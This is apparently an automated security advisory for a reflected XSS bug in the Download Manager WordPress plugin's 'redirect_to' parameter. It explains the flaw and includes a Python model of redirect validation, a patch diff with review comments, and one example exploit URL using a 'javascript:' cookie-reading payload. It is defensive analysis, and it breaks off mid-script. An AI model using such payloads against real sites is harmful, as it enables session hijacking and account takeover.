Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-1666: Download Manager <= 3.3.46 – Reflected Cross-Site Scripting via 'redirect_to' Parameter (download-manager)

CVE ID: CVE-2026-1666
Severity: Medium (CVSS 6.1)
CWE: 79
Vulnerable Version: 3.3.46
Patched Version: 3.3.47
Disclosed: February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1666:
This vulnerability is a reflected cross-site scripting (XSS) flaw in the Download Manager WordPress plugin. The issue affects the ‘redirect_to’ parameter in the login form shortcode across all plugin versions up to and including 3.3.46. Unauthenticated attackers can inject malicious JavaScript payloads that execute when victims click specially crafted links. The CVSS score of 6.1 reflects a medium-severity impact requiring user interaction.

The root cause is insufficient input sanitization and output escaping for the `redirect_to` GET parameter. The vulnerable code resides in three methods of the Login class: `form()`, `shortcode()`, and `loginForm()`, located at lines 141, 396, and 540 of `/download-manager/src/User/Login.php` respectively. Each method processes the `$log_redirect` variable, which carries the user-supplied redirect URL. The original code passed it through `strip_tags($log_redirect)`, which only removes HTML tags; a `javascript:` scheme URL contains no tags, so it passes through unchanged.

Exploitation occurs through the plugin’s login form shortcode. Attackers craft malicious URLs containing the ‘redirect_to’ parameter with JavaScript payloads. For example: `https://victim-site.com/login-page/?redirect_to=javascript:alert(document.cookie)//`. When users visit this URL, the login form displays with the malicious redirect value. If the user interacts with the form or the page processes the parameter, the JavaScript executes in the victim’s browser context. The attack requires social engineering to trick users into clicking the malicious link.

The patch replaces `strip_tags()` with `wp_validate_redirect()` in all three vulnerable methods. The WordPress core function `wp_validate_redirect()` validates the URL against an allow-list of redirect hosts (by default only the site's own host) and accepts only `http`/`https` or relative locations; when validation fails it returns the supplied safe default, here `home_url('/')`. This rejects `javascript:` scheme URLs and redirects to external domains. The patch also bumps the plugin version from 3.3.46 to 3.3.47 in the main plugin file.
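To make the difference between the two calls concrete, here is a self-contained Python model (added for this page; it is neither the plugin's nor WordPress core's code) that places a tag-stripping filter beside a same-origin redirect validator built from the checks described above: scheme restricted to `http`/`https`, host compared against the site's own host, fallback to the home URL otherwise. `SITE_HOST`, `DEFAULT_REDIRECT`, the function names and the sample inputs are all constructed for the example; the validator reproduces the described checks, not `wp_validate_redirect()`'s implementation.

```python
import re
from urllib.parse import urlsplit

# Constructed values for the example: stand-ins for the site's host and home_url('/').
SITE_HOST = "example-site.test"
DEFAULT_REDIRECT = "https://example-site.test/"

_TAG_RE = re.compile(r"<[^>]*>")
_CTRL_OR_SPACE_RE = re.compile(r"[\x00-\x20]")


def strip_tags(value: str) -> str:
    """Approximation of PHP strip_tags(): removes <...> markup and nothing else.
    A javascript: URL contains no markup, so it comes back unchanged."""
    return _TAG_RE.sub("", value)


def validate_redirect(location: str, fallback: str = DEFAULT_REDIRECT,
                      allowed_hosts: tuple = (SITE_HOST,)) -> str:
    """Same-origin redirect validator modelled on the checks described for
    wp_validate_redirect() (hypothetical model, not the core implementation).
    Accepts only absolute http(s) URLs on an allowed host or site-relative
    paths; everything else yields the fallback."""
    location = location.strip()
    # Embedded control characters or whitespace are a classic scheme-check
    # bypass ("java\tscript:"); browsers strip them, so reject outright.
    if not location or _CTRL_OR_SPACE_RE.search(location):
        return fallback
    try:
        parts = urlsplit(location)
        host = (parts.hostname or "").lower()
    except ValueError:  # e.g. malformed IPv6 literal
        return fallback
    scheme = parts.scheme.lower()
    if scheme and scheme not in ("http", "https"):
        return fallback  # javascript:, data:, vbscript:, ...
    if not parts.netloc:
        # No host: accept only a site-relative path starting with a single "/".
        if scheme or not location.startswith("/") or location.startswith("//"):
            return fallback
        return location
    if host not in allowed_hosts:
        return fallback  # external domain, or a userinfo trick like host@evil
    return location


def compare(values):
    """Return {input: (strip_tags result, validate_redirect result)} for review."""
    return {v: (strip_tags(v), validate_redirect(v)) for v in values}


if __name__ == "__main__":
    # Constructed sample inputs, including the javascript: scheme case from the advisory.
    samples = [
        "/wp-admin/",
        "https://example-site.test/downloads/",
        "javascript:alert(document.cookie)//",
        "//evil.test/",
        "https://example-site.test@evil.test/",
    ]
    for src, (stripped, validated) in compare(samples).items():
        print(f"{src!r}\n  strip_tags        -> {stripped!r}\n  validate_redirect -> {validated!r}")
```

Running the script shows that `strip_tags` returns the `javascript:` value untouched while the validator collapses it, the scheme-relative `//evil.test/` and the `host@evil.test` userinfo form to the home URL, and lets only the same-host URL and the site-relative path through. The control-character check matters because the scheme test alone would not catch a value such as `java\tscript:` that a browser normalises before executing.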

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of the victim’s browser session. This can lead to session hijacking, account takeover, content manipulation, and phishing attacks. Attackers could steal authentication cookies, redirect users to malicious sites, or perform actions on behalf of authenticated users. The vulnerability requires user interaction but no authentication, making it accessible to any attacker who can craft and distribute malicious links.

Differential between vulnerable and patched code

Code Diff
--- a/download-manager/download-manager.php
+++ b/download-manager/download-manager.php
@@ -5,7 +5,7 @@
 Description: Manage, Protect and Track file downloads, and sell digital products from your WordPress site. A complete digital asset management solution.
 Author: W3 Eden, Inc.
 Author URI: https://www.wpdownloadmanager.com/
-Version: 3.3.46
+Version: 3.3.47
 Text Domain: download-manager
 Domain Path: /languages
 */
@@ -40,7 +40,7 @@

 global $WPDM;

-define('WPDM_VERSION','3.3.46');
+define('WPDM_VERSION','3.3.47');

 define('WPDM_TEXT_DOMAIN','download-manager');

--- a/download-manager/src/Package/views/page-templates/page-template-1col-flat.php
+++ b/download-manager/src/Package/views/page-templates/page-template-1col-flat.php
@@ -37,17 +37,10 @@
     </div>
     <div class="card mb-3">
         <div class="card-header">
-
-            <div class="nav nav-tabs card-header-tabs" id="nav-tab" role="tablist">
-                <a class="nav-item nav-link active" id="nav-home-tab" data-toggle="tab" href="#nav-desc" role="tab" aria-controls="nav-home" aria-selected="true">[txt=Description]</a>
-            </div>
+            [txt=Description]
         </div>
         <div class="card-body">
-            <div class="tab-content" id="nav-tabContent">
-                <div class="tab-pane active" id="nav-desc" role="tabpanel" aria-labelledby="nav-home-tab">[description]</div>
-
-            </div>
-
+            [description]
         </div>
     </div>

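Review bot: this template change (dropping the tab markup around the description) is unrelated to the redirect fix. Bundling cosmetic edits into the security release makes the patch harder to backport and review; consider shipping them separately.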
--- a/download-manager/src/User/Dashboard.php
+++ b/download-manager/src/User/Dashboard.php
@@ -52,6 +52,14 @@
     {
         global $wp_query, $WPDM;

+        // Enqueue dashboard styles only when shortcode is used
+        wp_enqueue_style('wpdm-dashboard', WPDM_ASSET_URL . 'css/wpdm-dashboard.min.css', [], WPDM_VERSION);
+
+        // Enqueue media scripts for profile picture upload
+        if (is_user_logged_in()) {
+            wp_enqueue_media();
+        }
+
         ob_start();
         if (!is_user_logged_in()) {
             echo WPDM()->user->login->form($params);
--- a/download-manager/src/User/Login.php
+++ b/download-manager/src/User/Login.php
@@ -141,7 +141,7 @@
         $up = parse_url($log_redirect);
         if (isset($up['host']) && $up['host'] != $_SERVER['SERVER_NAME']) $log_redirect = __::valueof($_SERVER, 'REQUEST_URI', ['validate' => 'escs']);

-        $log_redirect = strip_tags($log_redirect);
+        $log_redirect = wp_validate_redirect($log_redirect, home_url('/'));

         if (!isset($params['logo'])) $params['logo'] = get_site_icon_url();

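Review bot: the replaced line is the right fix for the scheme problem, but the context line above it shows why the old code was bypassable: the `parse_url()` host comparison only fires when the URL has a host, and a `javascript:` URL has none, so it reached `strip_tags()`, which removes markup and leaves the scheme untouched. Keep in mind that `wp_validate_redirect()` validates rather than escapes; wherever `$log_redirect` is later written into the form (hidden input or `redirect_to` query string) it should still go through `esc_url()`/`esc_attr()` at output.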
@@ -396,7 +396,7 @@
         $up = parse_url($log_redirect);
         if (isset($up['host']) && $up['host'] != $_SERVER['SERVER_NAME']) $log_redirect = __::valueof($_SERVER, 'REQUEST_URI', ['validate' => 'escs']);

-        $log_redirect = strip_tags($log_redirect);
+        $log_redirect = wp_validate_redirect($log_redirect, home_url('/'));

         if (!isset($params['logo']) || $params['logo'] == '') $params['logo'] = get_site_icon_url();

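Review bot: this is the second of three byte-identical blocks (`parse_url()` host check followed by the validation call) across `form()`, `shortcode()` and `loginForm()`. Extracting them into one private helper on the Login class would mean the next hardening lands in one place instead of three and removes the risk of a fourth caller still using `strip_tags()`.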
@@ -540,7 +540,7 @@
         $up = parse_url($log_redirect);
         if (isset($up['host']) && $up['host'] != $_SERVER['SERVER_NAME']) $log_redirect = __::valueof($_SERVER, 'REQUEST_URI', ['validate' => 'escs']);

-        $log_redirect = strip_tags($log_redirect);
+        $log_redirect = wp_validate_redirect($log_redirect, home_url('/'));

         if (!isset($params['logo']) || $params['logo'] == '') $params['logo'] = get_site_icon_url();

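Review bot: with `wp_validate_redirect()` in place, the preceding `$up['host'] != $_SERVER['SERVER_NAME']` check is redundant; it covers only the external-host case, which the core function already rejects. Two overlapping checks invite divergence, so drop the manual comparison and rely on the core function, whose `allowed_redirect_hosts` filter is also the documented way to permit additional hosts.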
--- a/download-manager/src/User/views/already-logged-in.php
+++ b/download-manager/src/User/views/already-logged-in.php
@@ -8,212 +8,303 @@
  */

 if (!defined('ABSPATH')) die();
-?>

-<div class="w3eden">
-    <div class="wpdm-logged-in-card">
-        <!-- Success indicator -->
-        <div class="wpdm-logged-in-badge">
-            <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2.5" stroke-linecap="round" stroke-linejoin="round">
-                <polyline points="20 6 9 17 4 12"></polyline>
-            </svg>
-        </div>
+// Get color scheme to prevent flickering
+$color_scheme = get_option('__wpdm_color_scheme', 'system');
+$color_class = '';
+if ($color_scheme === 'dark') {
+    $color_class = 'dark-mode';
+} elseif ($color_scheme === 'light') {
+    $color_class = 'light-mode';
+}

-        <!-- Avatar with online indicator -->
-        <div class="wpdm-logged-in-avatar">
-            <img src="<?php echo esc_url(get_avatar_url(get_current_user_id(), ['size' => 160])); ?>" alt="<?php echo esc_attr($current_user->display_name); ?>" />
-            <span class="wpdm-online-dot"></span>
-        </div>
+// Get user avatar URL
+$avatar_url = get_avatar_url(get_current_user_id(), ['size' => 200, 'default' => 'mp']);

-        <!-- User info -->
-        <div class="wpdm-logged-in-info">
-            <span class="wpdm-logged-in-greeting"><?php _e("Welcome back", "download-manager"); ?></span>
-            <h3 class="wpdm-logged-in-name"><?php echo esc_html($current_user->display_name); ?></h3>
-            <p class="wpdm-logged-in-email"><?php echo esc_html($current_user->user_email); ?></p>
-        </div>
+// Enqueue auth styles for consistency
+wp_enqueue_style('wpdm-auth-forms', WPDM__Template::locate_url('auth-forms.css', __DIR__), [], WPDM_VERSION);
+?>

-        <!-- Action buttons -->
-        <div class="wpdm-logged-in-actions">
-            <a href="<?php echo esc_url(wpdm_user_dashboard_url()); ?>" class="btn btn-lg btn-primary">
-                <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
-                    <path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2"></path>
-                    <circle cx="12" cy="7" r="4"></circle>
-                </svg>
-                <?php _e("My Account", "download-manager"); ?>
-            </a>
-            <a href="<?php echo esc_url(wpdm_logout_url()); ?>" class="btn btn-lg btn-outline-secondary wpdm-btn-logout">
-                <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
-                    <path d="M9 21H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h4"></path>
-                    <polyline points="16 17 21 12 16 7"></polyline>
-                    <line x1="21" y1="12" x2="9" y2="12"></line>
-                </svg>
-                <?php _e("Logout", "download-manager"); ?>
-            </a>
+<div class="w3eden wpdm-auth-page <?php echo esc_attr($color_class); ?>" id="wpdm-already-logged-in">
+    <div class="wpdm-auth-split">
+        <div class="wpdm-auth-panel wpdm-auth-panel--centered">
+            <!-- Left Panel - Decorative -->
+            <div class="wpdm-auth-left">
+                <div class="wpdm-auth-grid"></div>
+                <div class="wpdm-auth-circles">
+                    <div class="wpdm-auth-circle"></div>
+                    <div class="wpdm-auth-circle"></div>
+                    <div class="wpdm-auth-circle"></div>
+                    <div class="wpdm-auth-circle"></div>
+                </div>
+
+                <div class="wpdm-auth-brand">
+                    <a href="<?php echo home_url(); ?>">
+                    <?php $logo = get_site_icon_url(); if($logo){ ?>
+                        <img src="<?php echo esc_attr($logo); ?>" alt="<?php echo esc_attr(get_bloginfo('name')); ?>" />
+                    <?php } else { ?>
+                        <div class="wpdm-auth-brand-icon">
+                            <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><circle cx="12" cy="12" r="10"/><path d="M12 16v-4"/><path d="M12 8h.01"/></svg>
+                        </div>
+                    <?php } ?>
+                    <span><?php echo esc_html(get_bloginfo('name')); ?></span>
+                    </a>
+                </div>
+
+                <div class="wpdm-auth-welcome">
+                    <div class="wpdm-auth-welcome-sub"><?php _e("You're signed in", "download-manager"); ?></div>
+                    <div class="wpdm-auth-welcome-title"><?php _e("WELCOME BACK", "download-manager"); ?></div>
+                    <div class="wpdm-auth-welcome-line"></div>
+                    <div class="wpdm-auth-welcome-text">
+                        <?php _e("You're already logged in. Visit your dashboard to manage downloads or logout to switch accounts.", "download-manager"); ?>
+                    </div>
+                </div>
+            </div>
+
+            <!-- Right Panel - Content -->
+            <div class="wpdm-auth-right">
+                <div class="wpdm-logged-in-content">
+                    <!-- Avatar with success ring -->
+                    <div class="wpdm-logged-in-avatar-wrap">
+                        <div class="wpdm-logged-in-avatar">
+                            <img src="<?php echo esc_url($avatar_url); ?>" alt="<?php echo esc_attr($current_user->display_name); ?>" />
+                            <span class="wpdm-avatar-check">
+                                <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="3" stroke-linecap="round" stroke-linejoin="round">
+                                    <polyline points="20 6 9 17 4 12"></polyline>
+                                </svg>
+                            </span>
+                        </div>
+                    </div>
+
+                    <!-- User info -->
+                    <div class="wpdm-logged-in-info">
+                        <h3 class="wpdm-logged-in-name"><?php echo esc_html($current_user->display_name); ?></h3>
+                        <p class="wpdm-logged-in-email"><?php echo esc_html($current_user->user_email); ?></p>
+                    </div>
+
+                    <!-- Action buttons -->
+                    <div class="wpdm-logged-in-actions">
+                        <a href="<?php echo esc_url(wpdm_user_dashboard_url()); ?>" class="wpdm-auth-btn">
+                            <svg viewBox="0 0 24 24" width="18" height="18" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
+                                <rect x="3" y="3" width="7" height="9"></rect>
+                                <rect x="14" y="3" width="7" height="5"></rect>
+                                <rect x="14" y="12" width="7" height="9"></rect>
+                                <rect x="3" y="16" width="7" height="5"></rect>
+                            </svg>
+                            <span><?php _e("Go to Dashboard", "download-manager"); ?></span>
+                        </a>
+                    </div>
+
+                    <div class="wpdm-logged-in-footer">
+                        <span><?php _e("Not you?", "download-manager"); ?></span>
+                        <a href="<?php echo esc_url(wpdm_logout_url()); ?>" class="wpdm-logout-link">
+                            <?php _e("Sign out", "download-manager"); ?>
+                            <svg viewBox="0 0 24 24" width="14" height="14" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
+                                <path d="M9 21H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h4"></path>
+                                <polyline points="16 17 21 12 16 7"></polyline>
+                                <line x1="21" y1="12" x2="9" y2="12"></line>
+                            </svg>
+                        </a>
+                    </div>
+                </div>
+            </div>
         </div>
     </div>
 </div>

 <style>
-    .w3eden .wpdm-logged-in-card {
-        max-width: 380px;
-        margin: 0 auto;
-        padding: 24px;
-        background: #ffffff;
-        border-radius: 16px;
-        box-shadow: 0 4px 24px rgba(0, 0, 0, 0.06), 0 1px 2px rgba(0, 0, 0, 0.04);
+    /* Already Logged In - Uses auth-forms.css base styles */
+
+    .wpdm-auth-panel--centered {
+        min-height: auto;
+    }
+
+    .wpdm-logged-in-content {
         text-align: center;
+        padding: 40px 0 20px;
+    }
+
+    /* Avatar wrapper with glow effect */
+    .wpdm-logged-in-avatar-wrap {
+        display: flex;
+        justify-content: center;
+        margin-bottom: 24px !important;
+    }
+
+    .wpdm-logged-in-avatar {
         position: relative;
-        font-family: var(--wpdm-font);
+        width: 120px;
+        height: 120px;
     }

-    /* Success badge */
-    .w3eden .wpdm-logged-in-badge {
+    .wpdm-logged-in-avatar::before {
+        content: '';
         position: absolute;
-        top: -16px;
-        left: 50%;
-        transform: translateX(-50%);
-        width: 40px;
-        height: 40px;
-        background: var(--color-success);
+        inset: -4px;
+        background: linear-gradient(135deg, #10b981 0%, #6366f1 50%, #8b5cf6 100%);
         border-radius: 50%;
-        display: flex;
-        align-items: center;
-        justify-content: center;
-        box-shadow: 0 4px 12px rgba(var(--color-success-rgb), 0.4);
+        animation: wpdm-gradient-spin 3s linear infinite;
+        width: calc(100% + 8px);
+        height: calc(100% + 8px);
     }

-    .w3eden .wpdm-logged-in-badge svg {
-        width: 20px;
-        height: 20px;
-        color: #fff;
+    @keyframes wpdm-gradient-spin {
+        0% { transform: rotate(0deg); }
+        100% { transform: rotate(360deg); }
     }

-    /* Avatar */
-    .w3eden .wpdm-logged-in-avatar {
-        position: relative;
-        display: inline-block;
-        margin-top: 20px;
-        margin-bottom: 20px;
+    .wpdm-logged-in-avatar::after {
+        content: '';
+        position: absolute;
+        inset: 0;
+        background: var(--wpdm-auth-card-bg, #fff);
+        border-radius: 50%;
     }

-    .w3eden .wpdm-logged-in-avatar img {
-        width: 100px;
-        height: 100px;
+    .wpdm-logged-in-avatar img {
+        position: relative;
+        z-index: 1;
+        width: 100%;
+        height: 100%;
         border-radius: 50%;
         object-fit: cover;
-        border: 4px solid #e2e8f0;
-        box-shadow: 0 4px 12px rgba(0, 0, 0, 0.08);
+        border: 4px solid var(--wpdm-auth-card-bg, #fff);
     }

-    .w3eden .wpdm-online-dot {
+    /* Success check badge */
+    .wpdm-avatar-check {
         position: absolute;
-        bottom: 6px;
-        right: 6px;
-        width: 16px;
-        height: 16px;
-        background: var(--color-success);
-        border: 3px solid #fff;
+        z-index: 2;
+        bottom: 0;
+        right: 0;
+        width: 32px;
+        height: 32px;
+        background: linear-gradient(135deg, #10b981 0%, #059669 100%);
         border-radius: 50%;
-        box-shadow: 0 2px 4px rgba(var(--color-success-rgb), 0.4);
+        border: 3px solid var(--wpdm-auth-card-bg, #fff);
+        display: flex;
+        align-items: center;
+        justify-content: center;
+        box-shadow: 0 4px 12px rgba(16, 185, 129, 0.4);
     }

-    /* User info */
-    .w3eden .wpdm-logged-in-info {
-        margin-bottom: 20px;
+    .wpdm-avatar-check svg {
+        width: 14px;
+        height: 14px;
+        color: #fff;
     }

-    .w3eden .wpdm-logged-in-greeting {
-        display: block;
-        font-size: 13px;
-        font-weight: 500;
-        color: var(--color-success);
-        text-transform: uppercase;
-        letter-spacing: 0.5px;
-        margin-bottom: 6px;
+    /* User info */
+    .wpdm-logged-in-info {
+        margin-bottom: 32px !important;
     }

-    .w3eden .wpdm-logged-in-name {
-        margin: 0 0 4px 0;
-        font-size: 22px;
+    .wpdm-logged-in-name {
+        margin: 0 0 8px 0 !important;
+        font-size: 26px;
         font-weight: 700;
+        color: var(--wpdm-auth-text, #1e293b);
         line-height: 1.3;
     }

-    .w3eden .wpdm-logged-in-email {
+    .wpdm-logged-in-email {
         margin: 0;
         font-size: 14px;
-        color: var(--color-muted);
+        color: var(--wpdm-auth-text-muted, #64748b);
+        display: inline-flex;
+        align-items: center;
+        gap: 6px;
+        padding: 6px 14px;
+        background: var(--wpdm-auth-bg, #f8fafc);
+        border-radius: 20px;
     }

-    /* Action buttons layout */
-    .w3eden .wpdm-logged-in-actions {
-        display: flex;
-        gap: 12px;
+    /* Action buttons */
+    .wpdm-logged-in-actions {
+        margin-bottom: 28px !important;
     }

-    .w3eden .wpdm-logged-in-actions .btn {
-        flex: 1;
-        letter-spacing: 0px;
+    .wpdm-logged-in-actions .wpdm-auth-btn {
+        display: inline-flex;
+        gap: 10px;
+        padding: 14px 32px;
+        font-size: 15px;
     }

-    /* Logout button - outline style */
-    .w3eden .wpdm-btn-logout {
-        background: transparent;
-        color: var(--color-secondary);
-        border: 1px solid #dadee3;
+    /* Footer with logout link */
+    .wpdm-logged-in-footer {
+        padding-top: 24px !important;
+        border-top: 1px solid var(--wpdm-auth-border, #e2e8f0);
+        font-size: 14px;
+        color: var(--wpdm-auth-text-muted, #64748b);
     }

-    .w3eden .wpdm-btn-logout:hover {
-        background: rgba(var(--color-danger-rgb), 0.1);
-        color: var(--color-danger);
-        border-color: var(--color-danger);
+    .wpdm-logout-link {
+        display: inline-flex;
+        align-items: center;
+        gap: 4px;
+        margin-left: 8px;
+        color: var(--wpdm-auth-text-muted, #64748b);
+        font-weight: 500;
+        text-decoration: none;
+        transition: all 0.2s ease;
     }

-    /* Dark mode support */
-    @media (prefers-color-scheme: dark) {
-        .w3eden:not(.light-mode) .wpdm-logged-in-card {
-            background: var(--dm-bg-secondary);
-        }
-
-        .w3eden:not(.light-mode) .wpdm-logged-in-avatar img {
-            border-color: var(--dm-bg-tertiary);
-        }
-
-        .w3eden:not(.light-mode) .wpdm-online-dot {
-            border-color: var(--dm-bg-secondary);
-        }
-
-        .w3eden:not(.light-mode) .wpdm-logged-in-email {
-            color: var(--dm-text-muted);
-        }
+    .wpdm-logout-link:hover {
+        color: #ef4444;
     }

-    /* Manual dark mode class */
-    .w3eden.dark-mode .wpdm-logged-in-card {
-        background: var(--dm-bg-secondary);
+    /* Dark mode overrides */
+    .wpdm-auth-page.dark-mode .wpdm-logged-in-avatar::after,
+    .wpdm-auth-page.dark-mode .wpdm-logged-in-avatar img,
+    .wpdm-auth-page.dark-mode .wpdm-avatar-check {
+        border-color: var(--wpdm-auth-card-bg, #1e293b);
     }

-    .w3eden.dark-mode .wpdm-logged-in-avatar img {
-        border-color: var(--dm-bg-tertiary);
+    .wpdm-auth-page.dark-mode .wpdm-logged-in-email {
+        background: rgba(255, 255, 255, 0.05);
     }

-    .w3eden.dark-mode .wpdm-online-dot {
-        border-color: var(--dm-bg-secondary);
-    }
+    @media (prefers-color-scheme: dark) {
+        .wpdm-auth-page:not(.light-mode) .wpdm-logged-in-avatar::after,
+        .wpdm-auth-page:not(.light-mode) .wpdm-logged-in-avatar img,
+        .wpdm-auth-page:not(.light-mode) .wpdm-avatar-check {
+            border-color: var(--wpdm-auth-card-bg, #1e293b);
+        }

-    .w3eden.dark-mode .wpdm-logged-in-email {
-        color: var(--dm-text-muted);
+        .wpdm-auth-page:not(.light-mode) .wpdm-logged-in-email {
+            background: rgba(255, 255, 255, 0.05);
+        }
     }

     /* Responsive */
     @media (max-width: 480px) {
-        .w3eden .wpdm-logged-in-card {
-            padding: 36px 24px;
-            margin: 0 16px;
+        .wpdm-logged-in-content {
+            padding: 30px 0 10px;
+        }
+
+        .wpdm-logged-in-avatar {
+            width: 100px;
+            height: 100px;
+        }
+
+        .wpdm-avatar-check {
+            width: 28px;
+            height: 28px;
+        }
+
+        .wpdm-avatar-check svg {
+            width: 12px;
+            height: 12px;
+        }
+
+        .wpdm-logged-in-name {
+            font-size: 22px;
         }

-        .w3eden .wpdm-logged-in-actions {
-            flex-direction: column;
+        .wpdm-logged-in-actions .wpdm-auth-btn {
+            width: 100%;
+            justify-content: center;
         }
     }
 </style>
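Review bot: two output-escaping slips in the new brand block: `<a href="<?php echo home_url(); ?>">` prints the URL unescaped, and `<img src="<?php echo esc_attr($logo); ?>">` escapes a URL with `esc_attr()`; both should use `esc_url()` as the avatar `src` further down already does. Neither value is attacker-controlled here, but a template reworked in a release whose purpose is fixing output escaping should be consistent about it.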
--- a/download-manager/src/User/views/dashboard/dashboard.php
+++ b/download-manager/src/User/views/dashboard/dashboard.php
@@ -1,61 +1,105 @@
 <?php
+/**
+ * User Dashboard - Main Layout
+ * Slack-style modern interface
+ */

 global $current_user;
-
 $store = get_user_meta(get_current_user_id(), '__wpdm_public_profile', true);
-
+$avatar_url = isset($store['logo']) && $store['logo'] != '' ? $store['logo'] : get_avatar_url($current_user->user_email, ['size' => 256]);
 ?>

-<div class="w3eden user-dashboard">
-    <div class="row">
-        <div id="wdmds" class="col-md-3">
-            <div class="visible-xs mb-2"><button type="button" class="btn btn-info btn-block" onclick="jQuery('#wpdmdbsb').toggleClass('dbopen')">Dashboard Menu</button></div>
-            <div id="wpdmdbsb">
-                <div class="visible-xs" style="position: absolute;right: 0;top: -2px;"><button type="button" class="btn btn-secondary btn-xs" style="border-radius: 0" onclick="jQuery('#wpdmdbsb').toggleClass('dbopen')">Close</button></div>
-            <div id="logo-block">
-                <img class="shop-logo" id="shop-logo" src="<?php echo isset($store['logo']) && $store['logo'] != '' ? $store['logo'] : get_avatar_url( $current_user->user_email, array('size' => 512) ); ?>"/>
+<div class="w3eden wpdm-dashboard">
+    <div class="wpdm-dashboard-frame">
+        <!-- Sidebar -->
+        <aside class="wpdm-sidebar" id="wpdm-sidebar">
+            <!-- User Profile (Top) -->
+            <div class="wpdm-sidebar-header">
+                <div class="wpdm-user-profile">
+                    <div class="wpdm-user-avatar">
+                        <img src="<?php echo esc_url($avatar_url); ?>" alt="<?php echo esc_attr($current_user->display_name); ?>">
+                        <span class="wpdm-user-status"></span>
+                    </div>
+                    <div class="wpdm-user-info">
+                        <span class="wpdm-user-name"><?php echo esc_html($current_user->display_name); ?></span>
+                        <span class="wpdm-user-role"><?php echo esc_html(ucfirst($current_user->roles[0] ?? 'User')); ?></span>
+                    </div>
+                </div>
             </div>
-            <div id="tabs">
+
+            <!-- Navigation -->
+            <nav class="wpdm-sidebar-nav">
                 <?php
-                if(is_array($this->dashboard_menu)) {
+                if (is_array($this->dashboard_menu)) {
                     foreach ($this->dashboard_menu as $section_id => $section) {
-                        echo "<div id='udm-{$section_id}'>";
-                        if (isset($section['title']) && $section['title'] != '') echo "<h3><i class='udbsap'></i>   {$section['title']} </h3>";
+                        if (isset($section['title']) && $section['title'] != '') {
+                            echo '<div class="wpdm-nav-group-title">' . esc_html($section['title']) . '</div>';
+                        }
+                        echo '<div class="wpdm-nav-group">';
                         foreach ($section['items'] as $page_id => $menu_item) {
                             $menu_url = get_permalink(get_the_ID()) . ($page_id != '' ? '?udb_page=' . $page_id : '');
-                            if (isset($params['flaturl']) && $params['flaturl'] == 1)
+                            if (isset($params['flaturl']) && $params['flaturl'] == 1) {
                                 $menu_url = get_permalink(get_the_ID()) . $page_id . ($page_id != '' ? '/' : '');
+                            }
+                            $is_active = ($udb_page == $page_id) ? 'active' : '';
+                            $icon = isset($menu_item['icon']) ? $menu_item['icon'] : (isset($default_icons[$page_id]) ? $default_icons[$page_id] : 'fas fa-circle');
                             ?>
-                            <a class="udb-item <?php echo $udb_page == $page_id ? 'selected' : ''; ?>"
-                               href="<?php echo $menu_url; ?>"><i
-                                        class="m-icon <?php echo isset($menu_item['icon']) ? $menu_item['icon'] : (isset($default_icons[$page_id]) ? $default_icons[$page_id] : 'fab fa-buffer'); ?> mr-3"></i><?php echo $menu_item['name']; ?>
+                            <a class="wpdm-nav-link <?php echo $is_active; ?>" href="<?php echo esc_url($menu_url); ?>">
+                                <i class="<?php echo esc_attr($icon); ?>"></i>
+                                <span><?php echo esc_html($menu_item['name']); ?></span>
                             </a>
-                        <?php }
-                        echo "</div>";
+                            <?php
+                        }
+                        echo '</div>';
                     }
                 }
                 ?>
-                <a class="udb-item" href="<?php echo wpdm_logout_url(); ?>"><i class="m-icon wpdm-logout color-danger mr-3"></i><span class="color-red"><?php _e('Logout', 'wmdpro'); ?></span></a>
+            </nav>

-            </div>
+            <?php do_action("wpdm_user_dashboard_sidebar"); ?>

-            <?php do_action("wpdm_user_dashboard_sidebar") ?>
+            <!-- Logout (Bottom) -->
+            <div class="wpdm-sidebar-footer">
+                <a class="wpdm-logout-link" href="<?php echo esc_url(wpdm_logout_url()); ?>">
+                    <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M9 21H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h4"></path><polyline points="16 17 21 12 16 7"></polyline><line x1="21" y1="12" x2="9" y2="12"></line></svg>
+                    <span><?php esc_html_e('Logout', 'download-manager'); ?></span>
+                </a>
             </div>
-            <div id="bdrp" onclick="jQuery('#wpdmdbsb').removeClass('dbopen')"></div>
-        </div>
-        <div class="col-md-9" id="wdmdc">
-
-
-            <?php echo isset($dashboard_contents) ? $dashboard_contents : ''; ?>
-
-
-        </div>
-
-
-
-
+        </aside>

+        <!-- Mobile Menu Toggle -->
+        <button type="button" class="wpdm-mobile-toggle" id="wpdm-mobile-toggle">
+            <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><line x1="3" y1="12" x2="21" y2="12"></line><line x1="3" y1="6" x2="21" y2="6"></line><line x1="3" y1="18" x2="21" y2="18"></line></svg>
+        </button>
+
+        <!-- Main Content -->
+        <main class="wpdm-main">
+            <div class="wpdm-main-inner">
+                <?php echo isset($dashboard_contents) ? $dashboard_contents : ''; ?>
+            </div>
+        </main>
     </div>
-</div>

+    <!-- Mobile Overlay -->
+    <div class="wpdm-overlay" id="wpdm-overlay"></div>
+</div>

+<script>
+jQuery(function($) {
+    var $sidebar = $('#wpdm-sidebar');
+    var $overlay = $('#wpdm-overlay');
+    var $toggle = $('#wpdm-mobile-toggle');
+
+    $toggle.on('click', function() {
+        $sidebar.addClass('open');
+        $overlay.addClass('visible');
+        $('body').css('overflow', 'hidden');
+    });
+
+    $overlay.on('click', function() {
+        $sidebar.removeClass('open');
+        $overlay.removeClass('visible');
